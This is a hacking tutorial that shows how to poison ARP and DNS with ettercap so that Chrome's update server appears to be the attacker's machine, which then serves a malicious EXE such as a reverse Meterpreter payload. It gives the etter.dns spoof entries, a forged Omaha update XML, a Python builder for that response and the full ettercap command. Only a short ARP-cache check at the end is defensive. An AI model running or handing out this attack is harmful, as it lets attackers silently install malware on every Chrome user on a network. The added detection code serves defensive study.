Beware: How Hackers can Instantly Infect Anyone Running Chrome

Well, I have to hand it to those geniuses... This one is quite interesting. Here we are going to look at a man-in-the-middle attack in which DNS poisoning is used to masquerade as the Google Chrome update server. Chrome asks the update server for an update EXE, and the attacker feeds it a malicious EXE instead. Apparently Chrome swallows it whole and just runs the thing.

Prerequisites:

  • Apache and ettercap
    OR
  • Kali Linux

Givens:

IP 111.111.111.111 is the attacker

IP 222.222.222.22X are the victims

(These are placeholder addresses. For the ARP poisoning used below to work, the attacker and the victims have to sit on the same LAN segment; ettercap cannot poison hosts across a router.)

Let’s begin:

Google Chrome has an auto-update feature that checks for updates every 15 minutes or so, downloads the update installer [EXE] and runs it. The whole attack rests on two things: the update check being answered by whoever the victim resolves the update server's name to, and the downloaded installer being run without any further check. By tricking the victim's computer into thinking the attack computer is the update server, you can make anyone running Chrome on the network run the malicious EXE silently.

Let's start with the basic background. The attacker needs to DNS-poison the network so that every host resolves the update server's name to the attacker's address.

(Please note, commands are done as if running Kali)

Shell:

find / -name etter.dns 2>/dev/null

(On Kali it normally lives at /etc/ettercap/etter.dns.)

Copy the path to etter.dns (highlight it, then Ctrl+Shift+C) and run

nano /path/to/etter.dns

You will be presented with the editable DNS spoofing file.

You want to add the entries

tools.google.com A 111.111.111.111
*tools.google.com A 111.111.111.111
www.tools.google.com A 111.111.111.111

(Each line is name, record type, address. The * entry is an ettercap wildcard, so it already covers any name ending in tools.google.com; the other two are kept for clarity.)

Ctrl+X, then Y to save.

Now let's set up our server to serve our Virus.exe:

Configure the server so that the update-check request from the victim (Chrome's updater POSTs its check to tools.google.com/service/update2, which now resolves to the attacker) is answered with the XML document we will make below.

(For more info on the XML format, see Google's Omaha Server Protocol v3.)

First we need to gather our info.

Are we hitting 32-bit Chrome or 64-bit?

Most people are on 64-bit these days, so this example targets 64-bit Chrome:

appid="4DC8B4CA-1DBA-483E-B5FA-D3C12E15B62D"
(you can grab the 32-bit app ID with Wireshark by watching an update check)

Now we need our Virus.exe (for example, a reverse Meterpreter EXE built with Metasploit).

Take the SHA-1 hash of Virus.exe and base64-encode it. Note that the Omaha hash attribute is the base64 of the raw 20-byte digest, not of the hex string, so hashing with sha1sum and base64-encoding that text gives the wrong value. You also need the exact size of the file in bytes for the size attribute.

EX: VXriGUVI0TNqfLlU02vBel4Q3Zo=

Then we craft our XML to serve. Two details the original listing got wrong are fixed here: the codebase has to be a URL (the updater fetches codebase + package name), and packages and actions belong inside a manifest element, whose opening tag was missing:

<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
  <daystart elapsed_seconds="56508"/>
  <app appid="{4DC8B4CA-1DBA-483E-B5FA-D3C12E15B62D}" status="ok">
    <updatecheck status="ok">
      <urls>
        <url codebase="http://111.111.111.111/"/>
      </urls>
      <!-- version is the version string of the offered update; placeholder value -->
      <manifest version="1.0.0.0">
        <packages>
          <!-- hash is the base64 SHA-1 of Virus.exe, size its length in bytes -->
          <package hash="VXriGUVI0TNqfLlU02vBel4Q3Zo=" name="Virus.exe" required="true" size="2983"/>
        </packages>
        <actions>
          <action arguments="" event="install" run="Virus.exe"/>
        </actions>
      </manifest>
    </updatecheck>
    <ping status="ok"/>
  </app>
</response>

Host the XML at the root of your server together with Virus.exe, so that the codebase URL plus the package name points at the file.
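The hash, size and element nesting above are easy to get wrong by hand, so here is an added Python helper that is not from the original post. It computes the package hash the way the Omaha attribute expects, emits the response with the manifest element in place, and then runs the size/hash consistency check an updater would apply to the downloaded file. The payload bytes, the codebase URL http://111.111.111.111/ and the manifest version 1.0.0.0 are constructed placeholders; the app ID is the 64-bit one from above.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

# Constructed stand-in for Virus.exe so the example runs offline; it is a few
# bytes of text, not an executable. Replace with open("Virus.exe", "rb").read().
FAKE_PAYLOAD = b"MZ-placeholder-not-a-real-executable"

# App ID from the post (64-bit Chrome). Codebase URL and manifest version are
# placeholders: codebase is the attacker host root where Virus.exe is served.
APP_ID = "4DC8B4CA-1DBA-483E-B5FA-D3C12E15B62D"
CODEBASE = "http://111.111.111.111/"
MANIFEST_VERSION = "1.0.0.0"


def omaha_package_hash(data: bytes) -> str:
    """Omaha v3 <package hash="..."> is the base64 of the raw 20-byte SHA-1
    digest (not of its hex string), which is what the post's example shows."""
    return base64.b64encode(hashlib.sha1(data).digest()).decode("ascii")


def build_update_response(appid: str, package_name: str, data: bytes,
                          codebase: str = CODEBASE,
                          manifest_version: str = MANIFEST_VERSION) -> str:
    """Emit the update-check response with the element nesting protocol v3
    uses: <urls> and <manifest> are siblings under <updatecheck>, and
    <packages>/<actions> sit inside <manifest>. size and hash are taken from
    the actual bytes so they cannot drift from the served file."""
    response = ET.Element("response", protocol="3.0", server="prod")
    ET.SubElement(response, "daystart", elapsed_seconds="56508")
    app = ET.SubElement(response, "app", appid="{" + appid + "}", status="ok")
    check = ET.SubElement(app, "updatecheck", status="ok")
    urls = ET.SubElement(check, "urls")
    ET.SubElement(urls, "url", codebase=codebase)
    manifest = ET.SubElement(check, "manifest", version=manifest_version)
    packages = ET.SubElement(manifest, "packages")
    ET.SubElement(packages, "package", hash=omaha_package_hash(data),
                  name=package_name, required="true", size=str(len(data)))
    actions = ET.SubElement(manifest, "actions")
    ET.SubElement(actions, "action", arguments="", event="install",
                  run=package_name)
    ET.SubElement(app, "ping", status="ok")
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            + ET.tostring(response, encoding="unicode"))


def package_matches_response(xml_text: str, package_name: str,
                             data: bytes) -> bool:
    """The consistency check an updater applies to a download: the bytes
    fetched from codebase + name must match the advertised size and hash.
    It catches a stale XML after Virus.exe is rebuilt; it is no defence when
    the same party authors both the XML and the file."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    for pkg in root.iter("package"):
        if pkg.get("name") == package_name:
            return (int(pkg.get("size", "-1")) == len(data)
                    and pkg.get("hash") == omaha_package_hash(data))
    return False


EXAMPLE_RESPONSE = build_update_response(APP_ID, "Virus.exe", FAKE_PAYLOAD)

if __name__ == "__main__":
    print(EXAMPLE_RESPONSE)
    print("consistent:", package_matches_response(EXAMPLE_RESPONSE,
                                                  "Virus.exe", FAKE_PAYLOAD))
```

Point the script at the real Virus.exe bytes and write its output to the file your web server returns for the update check; rerun it whenever the payload is rebuilt, since a stale hash or size is the most common reason the install action never fires.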

Then start ettercap with

ettercap -T -q -i wlan0 -P dns_spoof -M arp // //

(-T text interface, -q quiet, -i wlan0 the interface facing the victims, -P dns_spoof the plugin that answers from etter.dns, -M arp the ARP man-in-the-middle, and the two // target specs meaning every host on the segment.)

Now whenever Chrome on that network checks for an update, it is handed your file instead of the actual update.
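On the defending side, the footprint of -M arp // // in a victim's ARP cache is one MAC address answering for several IPs, typically the gateway's and the attacker's own. As an added example that is not part of the original post, here is a small parser that flags that over a constructed Windows-style `arp -a` listing; the addresses are the post's placeholders and the MACs are made up.

```python
import re
from collections import defaultdict

# Constructed `arp -a` listing from a Windows victim after the ettercap ARP
# MITM has run. Addresses are the post's placeholders; MACs are made up.
# The tell: the gateway entry and the attacker's own entry carry one MAC.
SAMPLE_ARP_TABLE = """\
Interface: 222.222.222.221 --- 0x4
  Internet Address      Physical Address      Type
  222.222.222.1         aa-bb-cc-dd-ee-01     dynamic
  111.111.111.111       aa-bb-cc-dd-ee-01     dynamic
  222.222.222.222       aa-bb-cc-dd-ee-22     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
"""

# One Windows-style row: IPv4, MAC with '-' or ':' separators, entry type.
ARP_ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)")


def parse_arp_table(text: str):
    """Return (ip, mac, type) tuples; header and Interface lines are skipped
    because they do not start with an IPv4 address followed by a MAC."""
    rows = []
    for line in text.splitlines():
        m = ARP_ROW.match(line)
        if m:
            rows.append((m.group(1), m.group(2).lower().replace(":", "-"),
                         m.group(3).lower()))
    return rows


def find_duplicate_macs(text: str):
    """Map each MAC that answers for more than one IP to those IPs. Only
    dynamic entries are considered: static multicast/broadcast rows are
    normal and would otherwise produce noise."""
    by_mac = defaultdict(list)
    for ip, mac, kind in parse_arp_table(text):
        if kind == "dynamic":
            by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    for mac, ips in find_duplicate_macs(SAMPLE_ARP_TABLE).items():
        print(f"{mac} claims {', '.join(ips)}: possible ARP poisoning")
```

A duplicate MAC is a strong hint rather than proof (a host with several addresses on one NIC shows the same pattern), so treat a hit on the gateway's address as the one worth investigating first.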
